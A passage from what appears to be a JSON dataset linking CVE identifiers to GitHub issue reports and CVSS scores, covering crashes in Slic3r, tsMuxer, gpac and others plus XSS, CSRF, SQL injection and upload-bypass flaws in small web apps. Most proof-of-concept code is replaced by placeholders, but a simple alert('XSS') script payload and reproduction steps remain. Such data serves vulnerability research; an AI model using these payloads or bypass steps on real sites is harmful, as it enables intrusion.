  75641. "Issue_Created_At": "2021-12-26T20:37:00Z",
  75642. "description": "NULL pointer dereference in NUMBERTAG MF XML parser (triangle tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at APITAG URLTAG is ineffective, since APITAG does not terminate the current function. Execution continues to line NUMBERTAG where atoi receives a NULL pointer input, and a crash results. Impact Denial of Service. Proposed mitigation Throw an exception in APITAG to ensure that file parsing stops immediately.",
  75643. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75644. "severity": "MEDIUM",
  75645. "baseScore": 5.5,
  75646. "impactScore": 3.6,
  75647. "exploitabilityScore": 1.8
  75648. },
  75649. {
  75650. "CVE_ID": "CVE-2021-45847",
  75651. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5120",
  75652. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5120",
  75653. "Repo_new": "slic3r/slic3r",
  75654. "Issue_Created_At": "2021-12-26T20:44:57Z",
  75655. "description": "NULL pointer dereference in NUMBERTAG MF XML parser (slic3r:volume tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The constructor of APITAG is invoked implicitly, leading to a crash ( APITAG ). The check at APITAG URLTAG is ineffective, since it occurs after the NULL pointer is dereferenced. Impact Denial of Service. Proposed mitigation Perform a NULL check on the return values from APITAG before constructing strings from them. Ensure that the NULL check terminates parsing, as proposed in NUMBERTAG and NUMBERTAG",
  75656. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75657. "severity": "MEDIUM",
  75658. "baseScore": 5.5,
  75659. "impactScore": 3.6,
  75660. "exploitabilityScore": 1.8
  75661. },
  75662. {
  75663. "CVE_ID": "CVE-2021-45848",
  75664. "Issue_Url_old": "https://github.com/nicotine-plus/nicotine-plus/issues/1777",
  75665. "Issue_Url_new": "https://github.com/nicotine-plus/nicotine-plus/issues/1777",
  75666. "Repo_new": "nicotine-plus/nicotine-plus",
  75667. "Issue_Created_At": "2021-12-22T17:11:07Z",
  75668. "description": "Just crashed on Win NUMBERTAG insider ring. Type: <class ERRORTAG Value: access: embedded null character in path Traceback: File APITAG line NUMBERTAG in network_event File APITAG line NUMBERTAG in queue_upload File APITAG line NUMBERTAG in queue_upload File APITAG line NUMBERTAG in file_is_shared",
  75669. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75670. "severity": "HIGH",
  75671. "baseScore": 7.5,
  75672. "impactScore": 3.6,
  75673. "exploitabilityScore": 3.9
  75674. },
  75675. {
  75676. "CVE_ID": "CVE-2021-45852",
  75677. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6",
  75678. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6",
  75679. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  75680. "Issue_Created_At": "2021-12-23T13:36:14Z",
  75681. "description": "Unauthorized adding patient in FILETAG . Version NUMBERTAG No login is required Steps to reproduce APITAG the data packet as APITAG can see that there is no cookie. FILETAG APITAG logging in, I found that the addition was successful FILETAG Source code review FILETAG line NUMBERTAG FILETAG Enter the APITAG function FILETAG The problem is that although the redirection is made, APITAG is not executed, causeing to continue to execute the code below. FILETAG Succeeded in adding patient without authorization",
  75682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  75683. "severity": "MEDIUM",
  75684. "baseScore": 5.3,
  75685. "impactScore": 1.4,
  75686. "exploitabilityScore": 3.9
  75687. },
  75688. {
  75689. "CVE_ID": "CVE-2021-45860",
  75690. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/510",
  75691. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/510",
  75692. "Repo_new": "justdan96/tsmuxer",
  75693. "Issue_Created_At": "2021-12-21T08:53:16Z",
  75694. "description": "An Integer Overflow in APITAG Hi, I found a integer overflow in APITAG URLTAG POC FILETAG With this poc, the buffer is too small but the condition on line NUMBERTAG results true. gdb ERRORTAG",
  75695. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75696. "severity": "MEDIUM",
  75697. "baseScore": 5.5,
  75698. "impactScore": 3.6,
  75699. "exploitabilityScore": 1.8
  75700. },
  75701. {
  75702. "CVE_ID": "CVE-2021-45861",
  75703. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/478",
  75704. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/478",
  75705. "Repo_new": "justdan96/tsmuxer",
  75706. "Issue_Created_At": "2021-10-18T14:29:17Z",
  75707. "description": "Assertion Failed in APITAG APITAG Hi, I Found an Assertion Failed error. Some info: APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG Run tsmuxer ERRORTAG POC FILETAG gdb output ERRORTAG",
  75708. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75709. "severity": "MEDIUM",
  75710. "baseScore": 5.5,
  75711. "impactScore": 3.6,
  75712. "exploitabilityScore": 1.8
  75713. },
  75714. {
  75715. "CVE_ID": "CVE-2021-45863",
  75716. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/509",
  75717. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/509",
  75718. "Repo_new": "justdan96/tsmuxer",
  75719. "Issue_Created_At": "2021-12-21T08:06:40Z",
  75720. "description": "heap buffer overflow in APITAG APITAG Hi, I found a heap buffer overflow error. Some Info APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG run tsmuxer APITAG Asan output ERRORTAG POC FILETAG",
  75721. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75722. "severity": "MEDIUM",
  75723. "baseScore": 5.5,
  75724. "impactScore": 3.6,
  75725. "exploitabilityScore": 1.8
  75726. },
  75727. {
  75728. "CVE_ID": "CVE-2021-45884",
  75729. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/20079",
  75730. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/20079",
  75731. "Repo_new": "brave/brave-browser",
  75732. "Issue_Created_At": "2021-12-13T20:42:44Z",
  75733. "description": "Desktop] Release notes for APITAG . Improve formatting of input values (send and swap NUMBERTAG URLTAG Full Fiat Balance not showing with ERC NUMBERTAG tokens NUMBERTAG URLTAG Update default widget list for desktop NUMBERTAG URLTAG it is possible to delete the active network on PATHTAG NUMBERTAG URLTAG Changes to sync QR code NUMBERTAG URLTAG Make APITAG screen working on both APITAG devices NUMBERTAG URLTAG Double click by APITAG buttons for Trezor transactions closes wallet panel NUMBERTAG URLTAG We aren\u2019t displaying asset balances until we get prices for them, we should NUMBERTAG URLTAG Don't treat unknown balances as NUMBERTAG show N/A instead NUMBERTAG ERRORTAG URLTAG Make the front end use the default currency and default cryptocurrency from settings NUMBERTAG URLTAG Link for IPFS preference settings page is hidden for some window sizes NUMBERTAG URLTAG Update NTP Background Images component for Fall NUMBERTAG wallpapers on desktop NUMBERTAG URLTAG hackerone NUMBERTAG CNAME Uncloacking in SOCKS5 protocol NUMBERTAG URLTAG Brave reading PATHTAG NUMBERTAG URLTAG Add menu to allow to edit/remove networks on wallet page NUMBERTAG URLTAG Allow folks to enable File System API with a Flag NUMBERTAG URLTAG Clicking Solve on adaptive captcha Brave Ads paused modal sometimes yields no action NUMBERTAG URLTAG Add Google's new iOS URL parameters to the query string filter NUMBERTAG URLTAG Implement APITAG and in particular APITAG version of EIP NUMBERTAG URLTAG Implement Rewards settings section inside brave://settings NUMBERTAG URLTAG hackerone] Strip referrer and origin in cross origin requests from a .onion origin NUMBERTAG URLTAG Re enable the post uninstall survey on Windows NUMBERTAG URLTAG Implement new Rewards NTP Widget NUMBERTAG design NUMBERTAG URLTAG Use error modals in Brave Rewards settings page instead of error notifications for linking related errors (convert these notifications to error modals NUMBERTAG URLTAG Unable to go backwards on IPFS pages when automatic APITAG redirection is enabled NUMBERTAG URLTAG",
  75734. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75735. "severity": "HIGH",
  75736. "baseScore": 7.5,
  75737. "impactScore": 3.6,
  75738. "exploitabilityScore": 3.9
  75739. },
  75740. {
  75741. "CVE_ID": "CVE-2021-45884",
  75742. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/19070",
  75743. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/19070",
  75744. "Repo_new": "brave/brave-browser",
  75745. "Issue_Created_At": "2021-10-28T16:16:06Z",
  75746. "description": "hackerone NUMBERTAG CNAME Uncloacking in SOCKS5 protocol. URLTAG",
  75747. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75748. "severity": "HIGH",
  75749. "baseScore": 7.5,
  75750. "impactScore": 3.6,
  75751. "exploitabilityScore": 3.9
  75752. },
  75753. {
  75754. "CVE_ID": "CVE-2021-45890",
  75755. "Issue_Url_old": "https://github.com/AuthGuard/AuthGuard/issues/166",
  75756. "Issue_Url_new": "https://github.com/authguard/authguard/issues/166",
  75757. "Repo_new": "authguard/authguard",
  75758. "Issue_Created_At": "2021-08-23T19:06:49Z",
  75759. "description": "Authentication ignores inactive identifiers.",
  75760. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75761. "severity": "CRITICAL",
  75762. "baseScore": 9.8,
  75763. "impactScore": 5.9,
  75764. "exploitabilityScore": 3.9
  75765. },
  75766. {
  75767. "CVE_ID": "CVE-2021-45928",
  75768. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/360",
  75769. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/360",
  75770. "Repo_new": "libjxl/libjxl",
  75771. "Issue_Created_At": "2021-07-26T11:42:15Z",
  75772. "description": "Out of bounds write in master libjxl reported by oss fuzz. Hello, oss fuzz is reporting an out of bounds write in libjxl master: ERRORTAG Reproducer: FILETAG APITAG testcase minimized NUMBERTAG jxl",
  75773. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  75774. "severity": "MEDIUM",
  75775. "baseScore": 5.5,
  75776. "impactScore": 3.6,
  75777. "exploitabilityScore": 1.8
  75778. },
  75779. {
  75780. "CVE_ID": "CVE-2021-45944",
  75781. "Issue_Url_old": "https://github.com/google/oss-fuzz-vulns/issues/16",
  75782. "Issue_Url_new": "https://github.com/google/oss-fuzz-vulns/issues/16",
  75783. "Repo_new": "google/oss-fuzz-vulns",
  75784. "Issue_Created_At": "2022-01-04T20:58:23Z",
  75785. "description": "Fixing commit from OS NUMBERTAG seems wrong. Hi URLTAG references a fixing commit which though only removes a documentation snipped. Unless my bisect done is wrong, then the following should be the fixing commit: URLTAG ERRORTAG",
  75786. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75787. "severity": "MEDIUM",
  75788. "baseScore": 5.5,
  75789. "impactScore": 3.6,
  75790. "exploitabilityScore": 1.8
  75791. },
  75792. {
  75793. "CVE_ID": "CVE-2021-45958",
  75794. "Issue_Url_old": "https://github.com/ultrajson/ultrajson/issues/501",
  75795. "Issue_Url_new": "https://github.com/ultrajson/ultrajson/issues/501",
  75796. "Repo_new": "ultrajson/ultrajson",
  75797. "Issue_Created_At": "2022-02-06T01:14:09Z",
  75798. "description": "Segmentation fault with large indent. What did you do? APITAG This is the smallest value that triggers the segfault on my machine with this build of ujson. I'm sure it's no coincidence that it's slightly larger than NUMBERTAG APITAG What did you expect to happen? Properly (if poorly) formatted output What actually happened? SIGSEGV What versions are you using? OS: Debian Sid Python NUMBERTAG APITAG NUMBERTAG d NUMBERTAG f I think the reason might lie in the fact that the APITAG call in encode does not appear to account for indentation at all. I wouldn't be surprised if other things could also trigger buffer overruns in certain conditions, e.g. the absence of APITAG causing the insertion of extra spaces NUMBERTAG and NUMBERTAG might be symptoms of the same underlying bug. Note that they both use indentation.",
  75799. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75800. "severity": "MEDIUM",
  75801. "baseScore": 5.5,
  75802. "impactScore": 3.6,
  75803. "exploitabilityScore": 1.8
  75804. },
  75805. {
  75806. "CVE_ID": "CVE-2021-45958",
  75807. "Issue_Url_old": "https://github.com/ultrajson/ultrajson/issues/502",
  75808. "Issue_Url_new": "https://github.com/ultrajson/ultrajson/issues/502",
  75809. "Repo_new": "ultrajson/ultrajson",
  75810. "Issue_Created_At": "2022-02-07T16:43:38Z",
  75811. "description": "CVETAG from oss fuzz report. Hi Recently CVETAG URLTAG was published which is an assignment due to the oss fuzz report in CVETAG see as well FILETAG This reference says: events: introduced: APITAG fixed: APITAG where though the APITAG refers to a change in the AFL++ fuzzer: URLTAG (see URLTAG Quoting a mail from MITRE: Some of the possibilities are NUMBERTAG There was never a buffer overflow. It was simply an artifact of an older version of the APITAG fuzzing software NUMBERTAG There still is a buffer overflow, but it is no longer detected. In particular, the introduced value above corresponds to URLTAG this has function names that mention the APITAG Append Unchecked\" words. One might guess that APITAG means accepting the risk of a buffer overflow. MITRE confirmed that the CVE could be rejected if it can be confirmed that the reproducer testcase from URLTAG does not have a buffer overflow for the APITAG call shown in FILETAG for APITAG NUMBERTAG Do you have any more insights here?",
  75812. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75813. "severity": "MEDIUM",
  75814. "baseScore": 5.5,
  75815. "impactScore": 3.6,
  75816. "exploitabilityScore": 1.8
  75817. },
  75818. {
  75819. "CVE_ID": "CVE-2021-45960",
  75820. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/531",
  75821. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/531",
  75822. "Repo_new": "libexpat/libexpat",
  75823. "Issue_Created_At": "2021-12-30T19:24:38Z",
  75824. "description": "Reserved NUMBERTAG security issue upcoming). TBA",
  75825. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75826. "severity": "HIGH",
  75827. "baseScore": 8.8,
  75828. "impactScore": 5.9,
  75829. "exploitabilityScore": 2.8
  75830. },
  75831. {
  75832. "CVE_ID": "CVE-2021-46020",
  75833. "Issue_Url_old": "https://github.com/mruby/mruby/issues/5613",
  75834. "Issue_Url_new": "https://github.com/mruby/mruby/issues/5613",
  75835. "Repo_new": "mruby/mruby",
  75836. "Issue_Created_At": "2021-12-27T16:51:56Z",
  75837. "description": "Untrusted Pointer Dereference in APITAG Untrusted Pointer Dereference in APITAG Description An Untrusted Pointer Dereference was discovered in APITAG The vulnerability causes a segmentation fault and application crash. version NUMBERTAG de0fcb APITAG System information Ubuntu NUMBERTAG focal, AMD EPYC NUMBERTAG Core NUMBERTAG GHz Proof of Concept poc CODETAG command: APITAG Result APITAG gdb ERRORTAG",
  75838. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75839. "severity": "HIGH",
  75840. "baseScore": 7.5,
  75841. "impactScore": 3.6,
  75842. "exploitabilityScore": 3.9
  75843. },
  75844. {
  75845. "CVE_ID": "CVE-2021-46024",
  75846. "Issue_Url_old": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/3",
  75847. "Issue_Url_new": "https://github.com/projectworldsofficial/online-shopping-webvsite-in-php/issues/3",
  75848. "Repo_new": "projectworldsofficial/online-shopping-webvsite-in-php",
  75849. "Issue_Created_At": "2021-12-28T02:29:39Z",
  75850. "description": "SQL Injection vulnerability via the \"id\" parameter in FILETAG . Version NUMBERTAG No login is required APITAG FILETAG Source code review FILETAG Remediation Validate input of id parameter in APITAG .",
  75851. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75852. "severity": "CRITICAL",
  75853. "baseScore": 9.8,
  75854. "impactScore": 5.9,
  75855. "exploitabilityScore": 3.9
  75856. },
  75857. {
  75858. "CVE_ID": "CVE-2021-46025",
  75859. "Issue_Url_old": "https://github.com/zhangyd-c/OneBlog/issues/27",
  75860. "Issue_Url_new": "https://github.com/zhangyd-c/oneblog/issues/27",
  75861. "Repo_new": "zhangyd-c/oneblog",
  75862. "Issue_Created_At": "2021-12-28T03:34:48Z",
  75863. "description": "There is a stored xss vulnerability exists in APITAG APITAG alert(\"xss\") APITAG code FILETAG FILETAG",
  75864. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75865. "severity": "MEDIUM",
  75866. "baseScore": 5.4,
  75867. "impactScore": 2.7,
  75868. "exploitabilityScore": 2.3
  75869. },
  75870. {
  75871. "CVE_ID": "CVE-2021-46026",
  75872. "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/39",
  75873. "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/39",
  75874. "Repo_new": "wangl1989/mysiteforme",
  75875. "Issue_Created_At": "2021-12-28T07:38:42Z",
  75876. "description": "There is a stored xss vulnerability exists in mysiteforme. Cross APITAG Scripting (XSS) vulnerability exists in mysiteforme By accessing the add blog tag function in the blog tag in the background blog management, and inserting the < script > alert (\"XSS\") APITAG code, it will be found that an XSS window will pop up on the page after adding successfully. FILETAG FILETAG",
  75877. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75878. "severity": "MEDIUM",
  75879. "baseScore": 5.4,
  75880. "impactScore": 2.7,
  75881. "exploitabilityScore": 2.3
  75882. },
  75883. {
  75884. "CVE_ID": "CVE-2021-46027",
  75885. "Issue_Url_old": "https://github.com/wangl1989/mysiteforme/issues/40",
  75886. "Issue_Url_new": "https://github.com/wangl1989/mysiteforme/issues/40",
  75887. "Repo_new": "wangl1989/mysiteforme",
  75888. "Issue_Created_At": "2021-12-29T06:10:07Z",
  75889. "description": "There is a stored xss vulnerability exists in mysiteforme . There is a CSRF vulnerability in the background blog management. The attacker constructs a CSRF load. Once the administrator clicks a malicious link, a blog tag will be added FILETAG FILETAG FILETAG FILETAG",
  75890. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  75891. "severity": "MEDIUM",
  75892. "baseScore": 6.5,
  75893. "impactScore": 3.6,
  75894. "exploitabilityScore": 2.8
  75895. },
  75896. {
  75897. "CVE_ID": "CVE-2021-46028",
  75898. "Issue_Url_old": "https://github.com/langhsu/mblog/issues/50",
  75899. "Issue_Url_new": "https://github.com/langhsu/mblog/issues/50",
  75900. "Repo_new": "langhsu/mblog",
  75901. "Issue_Created_At": "2021-12-30T06:21:03Z",
  75902. "description": "There is a CSRF vulnerability exists in APITAG There is a CSRF vulnerability in the background article management. The attacker constructs a CSRF load. Once the administrator clicks a malicious link, the article will be deleted. FILETAG FILETAG FILETAG FILETAG",
  75903. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  75904. "severity": "MEDIUM",
  75905. "baseScore": 4.3,
  75906. "impactScore": 1.4,
  75907. "exploitabilityScore": 2.8
  75908. },
  75909. {
  75910. "CVE_ID": "CVE-2021-46030",
  75911. "Issue_Url_old": "https://github.com/ChinaLHR/JavaQuarkBBS/issues/23",
  75912. "Issue_Url_new": "https://github.com/chinalhr/javaquarkbbs/issues/23",
  75913. "Repo_new": "chinalhr/javaquarkbbs",
  75914. "Issue_Created_At": "2021-12-28T03:40:49Z",
  75915. "description": "There are two stored XSS in APITAG APITAG Description\u3011 There is a Cross Site Scripting attack (XSS) vulnerability in the full version of APITAG By entering specific statements into the background tag management module, the attack statement will be stored in the database, and the next victim will be attacked when he accesses the tag module. APITAG Type\u3011 Cross Site Scripting (XSS) APITAG Version NUMBERTAG APITAG Verification\u3011 Find the Background Label Management module, select the new location and enter APITAG FILETAG APITAG FILETAG APITAG Suggestions\u3011 Strict filtering of user input data",
  75916. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  75917. "severity": "MEDIUM",
  75918. "baseScore": 5.4,
  75919. "impactScore": 2.7,
  75920. "exploitabilityScore": 2.3
  75921. },
  75922. {
  75923. "CVE_ID": "CVE-2021-46033",
  75924. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/69",
  75925. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/69",
  75926. "Repo_new": "saysky/forestblog",
  75927. "Issue_Created_At": "2021-12-28T07:42:20Z",
  75928. "description": "File upload bypass exists. In this code, the verification suffix should verify the file type after the last point\uff1a public final String APITAG = APITAG / \u4e0a\u4f20\u6587\u4ef6 MENTIONTAG file MENTIONTAG MENTIONTAG ERRORTAG / APITAG = \"/img\", method = APITAG public APITAG APITAG APITAG file) { APITAG //\u6587\u4ef6\u7684\u5b8c\u6574\u540d\u79f0, APITAG String filename = APITAG //\u6587\u4ef6\u540d,\u5982spring String name = APITAG APITAG //\u6587\u4ef6\u540e\u7f00,\u5982.jpeg String suffix = APITAG if APITAG NUMBERTAG return new APITAG } example: FILETAG FILETAG",
  75929. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75930. "severity": "CRITICAL",
  75931. "baseScore": 9.8,
  75932. "impactScore": 5.9,
  75933. "exploitabilityScore": 3.9
  75934. },
  75935. {
  75936. "CVE_ID": "CVE-2021-46034",
  75937. "Issue_Url_old": "https://github.com/saysky/ForestBlog/issues/70",
  75938. "Issue_Url_new": "https://github.com/saysky/forestblog/issues/70",
  75939. "Repo_new": "saysky/forestblog",
  75940. "Issue_Created_At": "2021-12-29T07:16:11Z",
  75941. "description": "XSS vulnerability exists. There is no character verification for the nickname of the registration interface FILETAG The administrator clicks the user function to pop up the XSS prompt box FILETAG",
  75942. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75943. "severity": "MEDIUM",
  75944. "baseScore": 6.1,
  75945. "impactScore": 2.7,
  75946. "exploitabilityScore": 2.8
  75947. },
  75948. {
  75949. "CVE_ID": "CVE-2021-46038",
  75950. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2000",
  75951. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2000",
  75952. "Repo_new": "gpac/gpac",
  75953. "Issue_Created_At": "2021-12-22T15:49:42Z",
  75954. "description": "untrusted pointer dereference APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result segmentation fault bt ERRORTAG",
  75955. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75956. "severity": "MEDIUM",
  75957. "baseScore": 5.5,
  75958. "impactScore": 3.6,
  75959. "exploitabilityScore": 1.8
  75960. },
  75961. {
  75962. "CVE_ID": "CVE-2021-46039",
  75963. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1999",
  75964. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1999",
  75965. "Repo_new": "gpac/gpac",
  75966. "Issue_Created_At": "2021-12-22T12:55:57Z",
  75967. "description": "untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt CODETAG",
  75968. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75969. "severity": "MEDIUM",
  75970. "baseScore": 5.5,
  75971. "impactScore": 3.6,
  75972. "exploitabilityScore": 1.8
  75973. },
  75974. {
  75975. "CVE_ID": "CVE-2021-46040",
  75976. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2003",
  75977. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2003",
  75978. "Repo_new": "gpac/gpac",
  75979. "Issue_Created_At": "2021-12-22T16:27:40Z",
  75980. "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  75981. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75982. "severity": "MEDIUM",
  75983. "baseScore": 5.5,
  75984. "impactScore": 3.6,
  75985. "exploitabilityScore": 1.8
  75986. },
  75987. {
  75988. "CVE_ID": "CVE-2021-46041",
  75989. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2004",
  75990. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2004",
  75991. "Repo_new": "gpac/gpac",
  75992. "Issue_Created_At": "2021-12-22T17:31:48Z",
  75993. "description": "Untrusted pointer dereference in co NUMBERTAG box_new (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  75994. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75995. "severity": "MEDIUM",
  75996. "baseScore": 5.5,
  75997. "impactScore": 3.6,
  75998. "exploitabilityScore": 1.8
  75999. },
  76000. {
  76001. "CVE_ID": "CVE-2021-46042",
  76002. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2002",
  76003. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2002",
  76004. "Repo_new": "gpac/gpac",
  76005. "Issue_Created_At": "2021-12-22T16:16:38Z",
  76006. "description": "Untrusted pointer dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt ERRORTAG",
  76007. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76008. "severity": "MEDIUM",
  76009. "baseScore": 5.5,
  76010. "impactScore": 3.6,
  76011. "exploitabilityScore": 1.8
  76012. },
  76013. {
  76014. "CVE_ID": "CVE-2021-46043",
  76015. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2001",
  76016. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2001",
  76017. "Repo_new": "gpac/gpac",
  76018. "Issue_Created_At": "2021-12-22T16:04:39Z",
  76019. "description": "Untrusted Pointer Dereference in gf_list_count (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result segmentation fault bt CODETAG",
  76020. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76021. "severity": "MEDIUM",
  76022. "baseScore": 5.5,
  76023. "impactScore": 3.6,
  76024. "exploitabilityScore": 1.8
  76025. },
  76026. {
  76027. "CVE_ID": "CVE-2021-46044",
  76028. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2006",
  76029. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2006",
  76030. "Repo_new": "gpac/gpac",
  76031. "Issue_Created_At": "2021-12-22T18:20:11Z",
  76032. "description": "Untrusted pointer dereference in APITAG (). Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault bt CODETAG",
  76033. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76034. "severity": "MEDIUM",
  76035. "baseScore": 5.5,
  76036. "impactScore": 3.6,
  76037. "exploitabilityScore": 1.8
  76038. },
  76039. {
  76040. "CVE_ID": "CVE-2021-46045",
  76041. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2007",
  76042. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2007",
  76043. "Repo_new": "gpac/gpac",
  76044. "Issue_Created_At": "2021-12-22T18:37:49Z",
  76045. "description": "Abort failed in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Abort bt CODETAG",
  76046. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76047. "severity": "MEDIUM",
  76048. "baseScore": 5.5,
  76049. "impactScore": 3.6,
  76050. "exploitabilityScore": 1.8
  76051. },
  76052. {
  76053. "CVE_ID": "CVE-2021-46046",
  76054. "Issue_Url_old": "https://github.com/gpac/gpac/issues/2005",
  76055. "Issue_Url_new": "https://github.com/gpac/gpac/issues/2005",
  76056. "Repo_new": "gpac/gpac",
  76057. "Issue_Created_At": "2021-12-22T17:52:53Z",
  76058. "description": "Untrusted pointer dereference in gf_isom_box_size () . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result Segmentation fault. bt CODETAG",
  76059. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  76060. "severity": "MEDIUM",
  76061. "baseScore": 5.5,
  76062. "impactScore": 3.6,
  76063. "exploitabilityScore": 1.8
  76064. },
  76065. {
